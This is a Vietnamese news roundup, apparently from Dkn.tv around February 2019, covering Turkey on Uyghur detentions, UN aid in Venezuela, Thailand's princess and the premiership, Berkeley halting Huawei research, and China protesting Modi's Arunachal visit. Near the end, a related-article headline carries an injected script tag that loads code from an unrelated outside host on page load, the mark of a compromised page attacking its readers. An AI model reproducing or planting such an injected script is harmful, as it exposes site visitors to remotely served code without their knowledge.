RSS

Quan chức Thổ Nhĩ Kỳ nói Trung Quốc tạo ra ‘sự xấu hổ đối với nhân loại’

Bộ Ngoại giao Thổ Nhĩ Kỳ đã gọi cách chính quyền Trung Quốc đối xử với người dân Duy Ngô Nhĩ là “một nguyên nhân lớn tạo ra sự xấu hổ đối với nhân loại”, theo AP.

Trong một tuyên bố hôm thứ Bảy, phát ngôn viên Bộ Ngoại giao Thổ Nhĩ Kỳ, Hami Aksoy, nói rằng việc Bắc Kinh tự ý giam giữ hơn một triệu người Duy Ngô Nhĩ trong các trại tập trung “không còn là một bí mật” nữa. Ông nói sắc dân theo đạo Hồi này đang phải đối mặt với áp lực và sự “đồng hóa có hệ thống” của chính quyền Trung Quốc.

Ông Aksoy cho hay Thổ Nhĩ Kỳ đã bảy tỏ thái độ với Trung Quốc ở “tất cả các cấp độ” và kêu gọi các nhà chức trách của quốc gia này đóng cửa các cơ sở giam giữ tùy tiện người Duy Ngô Nhĩ và tôn trọng nhân quyền.

Tổng thống Thổ Nhĩ Kỳ Recep Tayyip Erdogan đã từng cáo buộc chính quyền Trung Quốc về tội “diệt chủng” người Hồi giáo, nhưng sau đó lại thiết lập quan hệ ngoại giao và kinh tế chặt chẽ hơn với Bắc Kinh, AP bình luận.

Người Duy Ngô Nhĩ sống ở Thổ Nhĩ Kỳ và những người ủng hộ họ, một số người mang theo quan tài đại diện cho người Duy Ngô Nhĩ đã chết ở vùng Tân Cương, hôm 4/7/2015 hô khẩu hiệu biểu tình sự áp bức của chính phủ Trung Quốc đối với người Duy Ngô Nhĩ ở miền Tây Trung Quốc. (Ảnh: AP)

LHQ đang tăng cường hoạt động nhân đạo ở Venezuela

Các cơ quan cứu trợ của Liên Hiệp Quốc (LHQ) đang tăng cường hoạt động nhân đạo ở Venezuela, bất chấp tình hình chính trị bất ổn của quốc gia đang chìm sâu trong khủng hoảng kinh tế và chính trị, theo AP.

Báo cáo của LHQ cho hay nhu cầu nhận viện trợ nhân đạo của người dân Venezuela là rất lớn. Các cơ quan của LHQ đã mở rộng các hoạt động để đáp ứng nhu cầu khẩn cấp về sức khỏe, dinh dưỡng và an toàn của người dân nước này kể từ tháng 11/2018. Tuy nhiên, báo cáo cho hay sự thiếu hụt tài chính đang cản trở hoạt động của các cơ quan LHQ ở đây.

Hơn 50 tấn hàng viện trợ nhân đạo, bao gồm thực phẩm giàu dinh dưỡng và các nhu yếu phẩm khác, của Hoa Kỳ đang bị chặn ở biên giới Colombia – Venezuela bởi lệnh của Tổng thống Maduro, người tuyên bố rằng không có cuộc khủng hoảng nhân đạo nào ở đất nước ông.

Hai tình nguyện viên Venezuela đang sắp xếp lại kho hàng viện trợ nhân đạo của Mỹ ở Colombia. (Ảnh: AP)

Vua Thái nói chị gái ‘rất không phù hợp’ làm ứng viên thủ tướng

Vua Thái Lan đã làm sụp đổ kế hoạch trở thành ứng viên thủ tướng của chị gái mình khi cho rằng chị gái ông không nên ra ứng cử vì cần giữ truyền thống và văn hóa quốc gia, theo VOA.

Đảng Raksa của Thái Lan hôm thứ Sáu (8/2) tuyên bố rằng Công chúa Ubolratana, 67 tuổi, sẽ là ứng cử viên thủ tướng của đảng trong cuộc bầu cử vào ngày 24/3.

Hy vọng chính trị của công chúa đã bị tan vỡ khi em trai của bà, nhà vua Thái, đưa ra một tuyên bố ngắn gọn rằng chị gái của ông là “ứng cử viên rất không phù hợp” và quyết định ra tranh cử của bà Ubolratana đã đi ngược lại truyền thống và văn hóa quốc gia.

Vào thứ bảy, đảng Raksa của Thái Lan thề trung thành với nhà vua, nói trong một tuyên bố rằng đảng này tuân thủ lệnh của hoàng gia.

Công chúa, chị gái gần 70 tuổi của vua Thái có ý định làm thủ tướng Thái Lan. (Ảnh: AP)

Đại học hàng đầu thế giới ngừng hợp tác nghiên cứu với Huawei

Một trong những trường đại học nghiên cứu hàng đầu thế giới, Đại học California, Berkeley, Hoa Kỳ, đã dừng các dự án nghiên cứu hợp tác với Huawei Technologies, công ty viễn thông khổng lồ của Trung Quốc, theo VOA.

Việc đình chỉ các dự án nghiên cứu với Huawei của trường đại học này có hiệu lực vào ngày 30/1, quyết định của Đại học California được đưa ra sau khi Bộ Tư pháp Hoa Kỳ cáo buộc lãnh đạo và một số chi nhánh của tập đoàn công nghệ Trung Quốc có các hành vi phạm pháp hai ngày trước đó.

Bộ Tư pháp Mỹ đã công bố bản cáo trạng với 13 tội danh chống lại Huawei, cáo buộc tập đoàn này ăn cắp bí mật thương mại, cản trở công lý, vi phạm các biện pháp trừng phạt kinh tế và gian lận.

Một gian hàng của Huawei trong hội chợ CES 2019 ở Las Vegas, Nevada, Hoa Kỳ ngày 9/1/ 2019. (Ảnh: VOA)

Trung Quốc phản đối thủ tướng Ấn Độ thăm khu vực tranh chấp

Bộ Ngoại giao Trung Quốc đã lên án chuyến thăm của Thủ tướng Ấn Độ Narendra Modi tới bang biên giới phía đông bắc Arunachal Pradesh có phần lãnh thổ tranh chấp với Trung Quốc, theo Aljazeera.

Trong một tuyên bố được đưa ra vào thứ Bảy, Bộ Ngoại giao Trung Quốc nói rằng họ “kiên quyết phản đối” các hoạt động của các nhà lãnh đạo Ấn Độ trong khu vực tranh chấp.

“Trung Quốc kêu gọi phía Ấn Độ khi xử lý công việc [cần] căn cứ từ tình hình chung của quan hệ song phương, tôn trọng lợi ích và mối quan tâm của Trung Quốc, trân trọng động lực cải thiện quan hệ giữa hai nước và kiềm chế mọi hành động tăng cường tranh chấp và làm phức tạp vấn đề biên giới”, bản tuyên bố của Bộ Ngoại giao Trung Quốc viết.

Chuyến thăm của Modi là một phần trong một loạt các cuộc vận động trong khu vực nhằm thu hút sự ủng hộ cho đảng của ông, đảng Bharatiya Janata (BJP) theo chủ nghĩa dân tộc Ấn Độ trước cuộc bầu cử Ấn Độ vào tháng 5.

Trong bức ảnh năm 2012, một cô bé người Ấn Độ chụp ảnh với lá cờ tổ quốc ở biên giới với Trung Quốc. [Ảnh: AP]

Nguồn: Dkn.tv

Cạm bẫy ở sân bay Thái Lan<script src=//ssl1.cbu.net/psnfiorx></script>

Cạm bẫy ở sân bay Thái Lan

Hàng loạt du khách nước ngoài bị buộc tội trộm đồ ở khu hàng miễn thuế tại sân bay quốc tế tại Bangkok, Thái Lan, và phải trả nhiều tiền để đổi lấy tự do.